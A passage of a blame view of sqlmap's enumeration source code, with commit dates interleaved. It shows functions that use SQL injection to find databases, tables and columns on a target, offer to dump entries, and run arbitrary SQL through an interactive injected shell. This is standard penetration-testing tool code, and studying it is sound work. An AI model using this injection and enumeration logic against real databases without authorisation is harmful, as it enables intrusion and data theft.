|
|
query += tblQuery
|
|
|
|
query += exclDbsQuery
|
2011-01-19 02:02:11 +03:00
|
|
|
values = inject.getValue(query, blind=False)
|
2010-05-17 00:46:17 +04:00
|
|
|
|
2011-05-26 12:17:21 +04:00
|
|
|
if not isNoneValue(values):
|
2010-05-25 14:09:35 +04:00
|
|
|
if isinstance(values, basestring):
|
2010-05-17 00:46:17 +04:00
|
|
|
values = [ values ]
|
|
|
|
|
|
|
|
for foundDb, foundTbl in values:
|
2011-03-30 01:54:15 +04:00
|
|
|
foundDb = safeSQLIdentificatorNaming(foundDb)
|
|
|
|
foundTbl = safeSQLIdentificatorNaming(foundTbl, True)
|
2011-03-28 15:01:55 +04:00
|
|
|
|
2011-02-10 14:34:16 +03:00
|
|
|
if foundDb is None or foundTbl is None:
|
|
|
|
continue
|
|
|
|
|
2010-05-17 00:46:17 +04:00
|
|
|
if foundDb in foundTbls:
|
|
|
|
foundTbls[foundDb].append(foundTbl)
|
|
|
|
else:
|
|
|
|
foundTbls[foundDb] = [ foundTbl ]
|
|
|
|
else:
|
|
|
|
infoMsg = "fetching number of databases with table"
|
|
|
|
if tblConsider == "1":
|
|
|
|
infoMsg += "s like"
|
2011-03-30 01:54:15 +04:00
|
|
|
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl)
|
2010-05-17 00:46:17 +04:00
|
|
|
logger.info(infoMsg)
|
|
|
|
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.count
|
2010-05-17 00:46:17 +04:00
|
|
|
query += tblQuery
|
|
|
|
query += exclDbsQuery
|
2011-01-19 02:02:11 +03:00
|
|
|
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2)
|
2010-05-17 00:46:17 +04:00
|
|
|
|
2010-12-02 21:57:43 +03:00
|
|
|
if not isNumPosStrValue(count):
|
2011-04-30 17:20:05 +04:00
|
|
|
warnMsg = "no databases have table"
|
2010-05-17 00:46:17 +04:00
|
|
|
if tblConsider == "1":
|
|
|
|
warnMsg += "s like"
|
2011-03-30 01:54:15 +04:00
|
|
|
warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl)
|
2010-05-17 00:46:17 +04:00
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
continue
|
|
|
|
|
|
|
|
indexRange = getRange(count)
|
|
|
|
|
|
|
|
for index in indexRange:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.query
|
2010-05-17 00:46:17 +04:00
|
|
|
query += tblQuery
|
|
|
|
query += exclDbsQuery
|
|
|
|
query = agent.limitQuery(index, query)
|
2011-01-19 02:02:11 +03:00
|
|
|
foundDb = inject.getValue(query, inband=False, error=False)
|
2011-03-30 01:54:15 +04:00
|
|
|
foundDb = safeSQLIdentificatorNaming(foundDb)
|
2011-02-10 14:34:16 +03:00
|
|
|
|
2011-01-02 15:23:36 +03:00
|
|
|
if foundDb not in foundTbls:
|
|
|
|
foundTbls[foundDb] = []
|
2010-05-17 00:46:17 +04:00
|
|
|
|
|
|
|
if tblConsider == "2":
|
|
|
|
foundTbls[foundDb].append(tbl)
|
|
|
|
|
|
|
|
if tblConsider == "2":
|
|
|
|
continue
|
|
|
|
|
|
|
|
for db in foundTbls.keys():
|
2011-03-30 01:54:15 +04:00
|
|
|
db = safeSQLIdentificatorNaming(db)
|
2011-03-28 15:01:55 +04:00
|
|
|
|
2010-05-17 00:46:17 +04:00
|
|
|
infoMsg = "fetching number of table"
|
|
|
|
if tblConsider == "1":
|
|
|
|
infoMsg += "s like"
|
2011-03-30 01:54:15 +04:00
|
|
|
infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(tbl), db)
|
2010-05-17 00:46:17 +04:00
|
|
|
logger.info(infoMsg)
|
|
|
|
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.count2
|
2011-03-30 01:54:15 +04:00
|
|
|
query = query % unsafeSQLIdentificatorNaming(db)
|
2010-05-17 00:46:17 +04:00
|
|
|
query += " AND %s" % tblQuery
|
2011-01-19 02:02:11 +03:00
|
|
|
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2)
|
2010-05-17 00:46:17 +04:00
|
|
|
|
2010-12-02 21:57:43 +03:00
|
|
|
if not isNumPosStrValue(count):
|
2010-05-17 00:46:17 +04:00
|
|
|
warnMsg = "no table"
|
|
|
|
if tblConsider == "1":
|
|
|
|
warnMsg += "s like"
|
2011-03-30 01:54:15 +04:00
|
|
|
warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(tbl)
|
2010-05-17 00:46:17 +04:00
|
|
|
warnMsg += "in database '%s'" % db
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
continue
|
|
|
|
|
|
|
|
indexRange = getRange(count)
|
|
|
|
|
|
|
|
for index in indexRange:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.query2
|
2011-03-30 01:54:15 +04:00
|
|
|
query = query % unsafeSQLIdentificatorNaming(db)
|
2010-05-17 00:46:17 +04:00
|
|
|
query += " AND %s" % tblQuery
|
|
|
|
query = agent.limitQuery(index, query)
|
2011-01-19 02:02:11 +03:00
|
|
|
foundTbl = inject.getValue(query, inband=False, error=False)
|
2010-05-17 00:46:17 +04:00
|
|
|
kb.hintValue = foundTbl
|
2011-03-30 01:54:15 +04:00
|
|
|
foundTbl = safeSQLIdentificatorNaming(foundTbl, True)
|
2010-05-17 00:46:17 +04:00
|
|
|
foundTbls[db].append(foundTbl)
|
|
|
|
|
|
|
|
return foundTbls
|
2010-05-07 17:40:57 +04:00
|
|
|
|
|
|
|
def searchColumn(self):
|
2010-12-27 02:50:16 +03:00
|
|
|
bruteForce = False
|
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
|
2011-04-30 17:20:05 +04:00
|
|
|
errMsg = "information_schema not available, "
|
2010-05-07 17:40:57 +04:00
|
|
|
errMsg += "back-end DBMS is MySQL < 5.0"
|
2010-12-27 02:50:16 +03:00
|
|
|
bruteForce = True
|
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
elif Backend.isDbms(DBMS.ACCESS):
|
2011-04-30 17:20:05 +04:00
|
|
|
errMsg = "cannot retrieve column names, "
|
2010-12-27 02:50:16 +03:00
|
|
|
errMsg += "back-end DBMS is Access"
|
|
|
|
logger.error(errMsg)
|
|
|
|
bruteForce = True
|
|
|
|
|
|
|
|
if bruteForce:
|
2011-05-22 12:24:13 +04:00
|
|
|
message = "do you want to use common columns existence check? [Y/n/q]"
|
2010-12-27 02:50:16 +03:00
|
|
|
test = readInput(message, default="Y")
|
|
|
|
|
|
|
|
if test[0] in ("n", "N"):
|
|
|
|
return
|
|
|
|
elif test[0] in ("q", "Q"):
|
|
|
|
raise sqlmapUserQuitException
|
|
|
|
else:
|
|
|
|
regex = "|".join(conf.col.split(","))
|
2010-12-27 03:41:16 +03:00
|
|
|
conf.dumper.dbTableColumns(columnExists(paths.COMMON_COLUMNS, regex))
|
|
|
|
|
|
|
|
message = "do you want to dump entries? [Y/n] "
|
|
|
|
output = readInput(message, default="Y")
|
|
|
|
|
|
|
|
if output and output[0] not in ("n", "N"):
|
|
|
|
self.dumpAll()
|
|
|
|
|
|
|
|
return
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-01-28 19:36:09 +03:00
|
|
|
rootQuery = queries[Backend.getIdentifiedDbms()].search_column
|
2010-01-09 03:05:00 +03:00
|
|
|
foundCols = {}
|
|
|
|
dbs = {}
|
|
|
|
colList = conf.col.split(",")
|
2010-10-21 17:13:12 +04:00
|
|
|
colCond = rootQuery.inband.condition
|
|
|
|
dbCond = rootQuery.inband.condition2
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2010-05-07 17:40:57 +04:00
|
|
|
colConsider, colCondParam = self.likeOrExact("column")
|
2010-01-09 03:05:00 +03:00
|
|
|
|
|
|
|
for column in colList:
|
2011-03-30 01:54:15 +04:00
|
|
|
column = safeSQLIdentificatorNaming(column)
|
2011-03-28 15:01:55 +04:00
|
|
|
|
2010-05-17 00:46:17 +04:00
|
|
|
infoMsg = "searching column"
|
|
|
|
if colConsider == "1":
|
|
|
|
infoMsg += "s like"
|
2011-03-30 01:54:15 +04:00
|
|
|
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column)
|
2010-05-17 00:46:17 +04:00
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
foundCols[column] = {}
|
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
if conf.excludeSysDbs:
|
2010-05-07 17:40:57 +04:00
|
|
|
exclDbsQuery = "".join(" AND '%s' != %s" % (db, dbCond) for db in self.excludeDbsList)
|
2011-04-30 19:29:19 +04:00
|
|
|
infoMsg = "skipping system database%s: %s" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList))
|
2010-01-09 03:05:00 +03:00
|
|
|
logger.info(infoMsg)
|
|
|
|
else:
|
2010-05-07 17:40:57 +04:00
|
|
|
exclDbsQuery = ""
|
2010-01-09 03:05:00 +03:00
|
|
|
|
|
|
|
colQuery = "%s%s" % (colCond, colCondParam)
|
2011-03-30 01:54:15 +04:00
|
|
|
colQuery = colQuery % unsafeSQLIdentificatorNaming(column)
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2011-01-19 02:02:11 +03:00
|
|
|
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.inband.query
|
2010-01-09 03:05:00 +03:00
|
|
|
query += colQuery
|
2010-05-07 17:40:57 +04:00
|
|
|
query += exclDbsQuery
|
2011-01-19 02:02:11 +03:00
|
|
|
values = inject.getValue(query, blind=False)
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2011-05-26 12:17:21 +04:00
|
|
|
if not isNoneValue(values):
|
2010-05-25 14:09:35 +04:00
|
|
|
if isinstance(values, basestring):
|
2010-01-09 03:05:00 +03:00
|
|
|
values = [ values ]
|
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
for foundDb, foundTbl in values:
|
2011-03-30 01:54:15 +04:00
|
|
|
foundDb = safeSQLIdentificatorNaming(foundDb)
|
|
|
|
foundTbl = safeSQLIdentificatorNaming(foundTbl, True)
|
2011-03-28 15:01:55 +04:00
|
|
|
|
2011-02-10 14:34:16 +03:00
|
|
|
if foundDb is None or foundTbl is None:
|
|
|
|
continue
|
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
if foundDb not in dbs:
|
|
|
|
dbs[foundDb] = {}
|
|
|
|
|
|
|
|
if foundTbl not in dbs[foundDb]:
|
|
|
|
dbs[foundDb][foundTbl] = {}
|
|
|
|
|
|
|
|
if colConsider == "1":
|
|
|
|
conf.db = foundDb
|
|
|
|
conf.tbl = foundTbl
|
|
|
|
conf.col = column
|
|
|
|
|
|
|
|
self.getColumns(onlyColNames=True)
|
|
|
|
|
|
|
|
dbs[foundDb][foundTbl].update(kb.data.cachedColumns[foundDb][foundTbl])
|
|
|
|
kb.data.cachedColumns = {}
|
|
|
|
else:
|
|
|
|
dbs[foundDb][foundTbl][column] = None
|
|
|
|
|
|
|
|
if foundDb in foundCols[column]:
|
|
|
|
foundCols[column][foundDb].append(foundTbl)
|
|
|
|
else:
|
|
|
|
foundCols[column][foundDb] = [ foundTbl ]
|
2010-01-09 03:05:00 +03:00
|
|
|
else:
|
|
|
|
infoMsg = "fetching number of databases with tables containing column"
|
|
|
|
if colConsider == "1":
|
|
|
|
infoMsg += "s like"
|
|
|
|
infoMsg += " '%s'" % column
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.count
|
2010-01-09 03:05:00 +03:00
|
|
|
query += colQuery
|
2010-05-07 17:40:57 +04:00
|
|
|
query += exclDbsQuery
|
2011-01-19 02:02:11 +03:00
|
|
|
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2)
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2010-12-02 21:57:43 +03:00
|
|
|
if not isNumPosStrValue(count):
|
2011-04-30 17:20:05 +04:00
|
|
|
warnMsg = "no databases have tables containing column"
|
2010-01-09 03:05:00 +03:00
|
|
|
if colConsider == "1":
|
|
|
|
warnMsg += "s like"
|
|
|
|
warnMsg += " '%s'" % column
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
continue
|
|
|
|
|
2010-01-11 16:06:16 +03:00
|
|
|
indexRange = getRange(count)
|
2010-01-09 03:05:00 +03:00
|
|
|
|
|
|
|
for index in indexRange:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.query
|
2010-01-09 03:05:00 +03:00
|
|
|
query += colQuery
|
2010-05-07 17:40:57 +04:00
|
|
|
query += exclDbsQuery
|
2010-01-09 03:05:00 +03:00
|
|
|
query = agent.limitQuery(index, query)
|
2011-01-19 02:02:11 +03:00
|
|
|
db = inject.getValue(query, inband=False, error=False)
|
2011-03-30 01:54:15 +04:00
|
|
|
db = safeSQLIdentificatorNaming(db)
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
if db not in dbs:
|
|
|
|
dbs[db] = {}
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
if db not in foundCols[column]:
|
|
|
|
foundCols[column][db] = []
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
for column, dbData in foundCols.items():
|
|
|
|
colQuery = "%s%s" % (colCond, colCondParam)
|
|
|
|
colQuery = colQuery % column
|
2010-01-10 22:12:54 +03:00
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
for db in dbData:
|
2011-03-30 01:54:15 +04:00
|
|
|
db = safeSQLIdentificatorNaming(db)
|
2011-03-28 15:01:55 +04:00
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
infoMsg = "fetching number of tables containing column"
|
|
|
|
if colConsider == "1":
|
|
|
|
infoMsg += "s like"
|
2011-03-30 01:54:15 +04:00
|
|
|
infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(column), db)
|
2010-05-17 20:16:49 +04:00
|
|
|
logger.info(infoMsg)
|
2010-01-10 22:12:54 +03:00
|
|
|
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.count2
|
2010-01-09 03:05:00 +03:00
|
|
|
query = query % db
|
|
|
|
query += " AND %s" % colQuery
|
2011-01-19 02:02:11 +03:00
|
|
|
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2)
|
2010-01-10 22:12:54 +03:00
|
|
|
|
2010-12-02 21:57:43 +03:00
|
|
|
if not isNumPosStrValue(count):
|
2010-05-17 20:16:49 +04:00
|
|
|
warnMsg = "no tables contain column"
|
|
|
|
if colConsider == "1":
|
|
|
|
warnMsg += "s like"
|
|
|
|
warnMsg += " '%s' " % column
|
|
|
|
warnMsg += "in database '%s'" % db
|
|
|
|
logger.warn(warnMsg)
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
continue
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
indexRange = getRange(count)
|
2010-01-10 22:12:54 +03:00
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
for index in indexRange:
|
2010-10-21 17:13:12 +04:00
|
|
|
query = rootQuery.blind.query2
|
2010-01-09 03:05:00 +03:00
|
|
|
query = query % db
|
|
|
|
query += " AND %s" % colQuery
|
2010-05-17 20:16:49 +04:00
|
|
|
query = agent.limitQuery(index, query)
|
2011-01-19 02:02:11 +03:00
|
|
|
tbl = inject.getValue(query, inband=False, error=False)
|
2010-05-17 20:16:49 +04:00
|
|
|
kb.hintValue = tbl
|
2010-01-10 00:39:10 +03:00
|
|
|
|
2011-03-30 01:54:15 +04:00
|
|
|
tbl = safeSQLIdentificatorNaming(tbl, True)
|
2011-03-28 15:01:55 +04:00
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
if tbl not in dbs[db]:
|
|
|
|
dbs[db][tbl] = {}
|
2010-01-10 00:39:10 +03:00
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
if colConsider == "1":
|
|
|
|
conf.db = db
|
|
|
|
conf.tbl = tbl
|
|
|
|
conf.col = column
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
self.getColumns(onlyColNames=True)
|
2010-01-10 00:39:10 +03:00
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
dbs[db][tbl].update(kb.data.cachedColumns[db][tbl])
|
|
|
|
kb.data.cachedColumns = {}
|
|
|
|
else:
|
|
|
|
dbs[db][tbl][column] = None
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
foundCols[column][db].append(tbl)
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2010-05-17 20:16:49 +04:00
|
|
|
self.dumpFoundColumn(dbs, foundCols, colConsider)
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2010-05-07 17:40:57 +04:00
|
|
|
def search(self):
|
|
|
|
if conf.db:
|
2010-05-28 20:43:04 +04:00
|
|
|
conf.dumper.lister("found databases", self.searchDb())
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-05-07 17:40:57 +04:00
|
|
|
if conf.tbl:
|
2010-05-28 20:43:04 +04:00
|
|
|
conf.dumper.dbTables(self.searchTable())
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2008-10-26 20:07:55 +03:00
|
|
|
if conf.col:
|
2010-05-07 17:40:57 +04:00
|
|
|
self.searchColumn()
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2010-05-07 17:40:57 +04:00
|
|
|
if not conf.db and not conf.tbl and not conf.col:
|
|
|
|
errMsg = "missing parameter, provide -D, -T or -C together "
|
|
|
|
errMsg += "with --search"
|
|
|
|
raise sqlmapMissingMandatoryOptionException, errMsg
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
def sqlQuery(self, query):
|
2011-01-21 00:49:06 +03:00
|
|
|
output = None
|
2010-01-05 19:15:31 +03:00
|
|
|
sqlType = None
|
2011-01-21 00:49:06 +03:00
|
|
|
getOutput = None
|
2008-12-19 23:09:46 +03:00
|
|
|
|
|
|
|
for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
|
|
|
|
for sqlStatement in sqlStatements:
|
|
|
|
if query.lower().startswith(sqlStatement):
|
|
|
|
sqlType = sqlTitle
|
|
|
|
|
|
|
|
break
|
|
|
|
|
2011-01-21 00:49:06 +03:00
|
|
|
if not self.alwaysRetrieveSqlOutput:
|
|
|
|
message = "do you want to retrieve the SQL statement output? "
|
2011-05-02 01:41:14 +04:00
|
|
|
|
|
|
|
if not sqlType or 'SELECT' in sqlType:
|
|
|
|
message += "[Y/n/a] "
|
|
|
|
getOutput = readInput(message, default="Y")
|
|
|
|
else:
|
|
|
|
message += "[y/N/a] "
|
|
|
|
getOutput = readInput(message, default="N")
|
2011-01-21 00:49:06 +03:00
|
|
|
|
|
|
|
if getOutput in ("a", "A"):
|
|
|
|
self.alwaysRetrieveSqlOutput = True
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2011-01-21 00:49:06 +03:00
|
|
|
if not getOutput or getOutput in ("y", "Y") or self.alwaysRetrieveSqlOutput:
|
2010-03-31 17:52:51 +04:00
|
|
|
infoMsg = "fetching %s query output: '%s'" % (sqlType if sqlType is not None else "SQL", query)
|
2008-12-19 23:48:33 +03:00
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
output = inject.getValue(query, fromUser=True)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
return output
|
2008-12-19 23:09:46 +03:00
|
|
|
else:
|
2010-12-18 18:57:47 +03:00
|
|
|
if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct:
|
2011-04-30 17:20:05 +04:00
|
|
|
warnMsg = "execution of custom SQL queries is only "
|
2010-10-15 19:37:15 +04:00
|
|
|
warnMsg += "available when stacked queries are supported"
|
2010-09-25 02:09:33 +04:00
|
|
|
logger.warn(warnMsg)
|
2008-12-19 23:48:33 +03:00
|
|
|
return None
|
|
|
|
else:
|
|
|
|
if sqlType:
|
2010-03-31 17:52:51 +04:00
|
|
|
infoMsg = "executing %s query: '%s'" % (sqlType if sqlType is not None else "SQL", query)
|
2008-12-19 23:48:33 +03:00
|
|
|
else:
|
|
|
|
infoMsg = "executing unknown SQL type query: '%s'" % query
|
|
|
|
logger.info(infoMsg)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2008-12-19 23:48:33 +03:00
|
|
|
inject.goStacked(query)
|
|
|
|
|
|
|
|
infoMsg = "done"
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
output = False
|
|
|
|
|
|
|
|
return output
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
def sqlShell(self):
|
2011-04-30 17:20:05 +04:00
|
|
|
infoMsg = "calling %s shell. To quit type " % Backend.getIdentifiedDbms()
|
2008-11-12 03:36:50 +03:00
|
|
|
infoMsg += "'x' or 'q' and press ENTER"
|
|
|
|
logger.info(infoMsg)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
|
|
|
autoCompletion(sqlShell=True)
|
|
|
|
|
|
|
|
while True:
|
|
|
|
query = None
|
|
|
|
|
|
|
|
try:
|
2009-04-22 15:48:07 +04:00
|
|
|
query = raw_input("sql-shell> ")
|
2010-05-28 20:43:04 +04:00
|
|
|
query = utf8decode(query)
|
2008-10-15 19:38:22 +04:00
|
|
|
except KeyboardInterrupt:
|
|
|
|
print
|
|
|
|
errMsg = "user aborted"
|
|
|
|
logger.error(errMsg)
|
|
|
|
except EOFError:
|
|
|
|
print
|
|
|
|
errMsg = "exit"
|
|
|
|
logger.error(errMsg)
|
|
|
|
break
|
|
|
|
|
|
|
|
if not query:
|
|
|
|
continue
|
|
|
|
|
|
|
|
if query.lower() in ( "x", "q", "exit", "quit" ):
|
|
|
|
break
|
|
|
|
|
|
|
|
output = self.sqlQuery(query)
|
|
|
|
|
|
|
|
if output and output != "Quit":
|
2010-05-28 20:43:04 +04:00
|
|
|
conf.dumper.query(query, output)
|
2008-12-19 23:48:33 +03:00
|
|
|
|
2010-01-02 05:02:12 +03:00
|
|
|
elif not output:
|
2008-12-19 23:48:33 +03:00
|
|
|
pass
|
|
|
|
|
2008-10-15 19:38:22 +04:00
|
|
|
elif output != "Quit":
|
2010-10-21 02:09:03 +04:00
|
|
|
dataToStdout("No output\n")
|